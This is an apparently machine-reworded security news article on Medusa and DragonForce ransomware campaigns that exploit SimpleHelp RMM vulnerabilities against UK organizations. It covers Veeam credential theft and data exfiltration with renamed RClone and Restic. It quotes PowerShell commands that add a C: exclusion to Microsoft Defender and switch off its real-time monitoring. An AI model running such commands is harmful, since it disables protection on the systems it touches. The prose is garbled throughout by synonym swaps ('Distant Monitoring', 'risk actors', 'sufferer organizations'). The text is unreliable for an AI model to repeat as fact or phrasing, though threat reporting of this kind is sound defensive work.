A classy wave of ransomware assaults concentrating on UK organizations has emerged in 2025, exploiting vulnerabilities within the widely-used SimpleHelp Distant Monitoring and Administration platform.
Two outstanding ransomware teams, Medusa and DragonForce, have weaponized three vital vulnerabilities (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728) to realize unauthorized entry via trusted third-party distributors and Managed Service Suppliers.
The assault campaigns display a regarding shift in ransomware techniques, the place risk actors compromise supplier-controlled RMM infrastructure slightly than immediately concentrating on sufferer organizations.
By exploiting unpatched SimpleHelp cases working with SYSTEM-level privileges, attackers achieved complete management over downstream buyer networks with minimal resistance.
This provide chain method permits adversaries to bypass conventional perimeter defenses and leverage the inherent belief between organizations and their service suppliers.
Zensec safety researchers recognized these coordinated campaigns after investigating a number of intrusions throughout the primary and second quarters of 2025.
The Medusa ransomware group struck first in Q1 2025, deploying their malicious payloads via compromised MSP environments.
Following the same playbook, DragonForce launched their offensive in Q2 2025, concentrating on organizations via the identical susceptible RMM infrastructure.
Weblog website (Supply – Zensec)
Each teams demonstrated superior operational capabilities, combining automated deployment instruments with hands-on keyboard methods to maximise influence.
The monetary and operational penalties have been extreme for affected organizations. Past system encryption, each risk actor teams engaged in double extortion techniques, exfiltrating delicate company knowledge earlier than deploying ransomware.
Victims confronted not solely the fast disruption of encrypted techniques but additionally the specter of knowledge publicity on darkish internet leak websites, compelling organizations to navigate advanced choices concerning ransom funds and public disclosure.
Assault Execution and Protection Evasion Methods
As soon as inside sufferer networks via the compromised SimpleHelp platform, each ransomware teams deployed refined toolsets to disable safety protections and set up persistence.
Medusa Weblog (Supply – Zensec)
The Medusa group leveraged PDQ Deploy to push PowerShell instructions that systematically dismantled Microsoft Defender protections throughout the surroundings.
The attackers executed base64-encoded instructions so as to add exclusion paths and disable real-time monitoring:-
Add-MpPreference -ExclusionPath “C:”
Set-MpPreference -MAPSReporting Disable
Set-MpPreference -DisableRealtimeMonitoring $true
The encoded PowerShell payload delivered via PDQ Deploy, whereas the decoded model reveals the protection disabling instructions.
Moreover this, the precise Defender exclusion modifications carried out by the risk actors.
The Medusa group deployed their ransomware payload, recognized as “Gaze.exe,” alongside specialised drivers together with Smuot.sys and CSAgent.sys to additional inhibit antivirus merchandise.
Researchers have linked these drivers to the Abyssworker toolkit, a identified safety evasion framework.
DragonForce operators took a special method, creating native administrator accounts named “admin” and putting in AnyDesk for persistent distant entry.
Additionally they focused Veeam backup servers utilizing the Get-Veeam-Creds.ps1 script to extract plaintext credentials from SQL password shops, successfully compromising backup restoration capabilities.
Knowledge exfiltration strategies various between the teams. Medusa utilized RClone, cleverly renamed to “lsp.exe” to evade detection signatures, with filtering parameters designed to switch information beneath 1500MB and older than 1500 days.
DragonForce employed Restic, an open-source backup instrument, to switch stolen knowledge to Wasabisys S3-compatible cloud storage endpoints.
Following encryption, Medusa techniques displayed the “.MEDUSA” file extension with ransom notes titled “!!!READ_ME_MEDUSA!!!.txt,” whereas DragonForce appended “*.dragonforce_encrypted” extensions and left “readme.txt” notes on affected machines.
Observe us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.
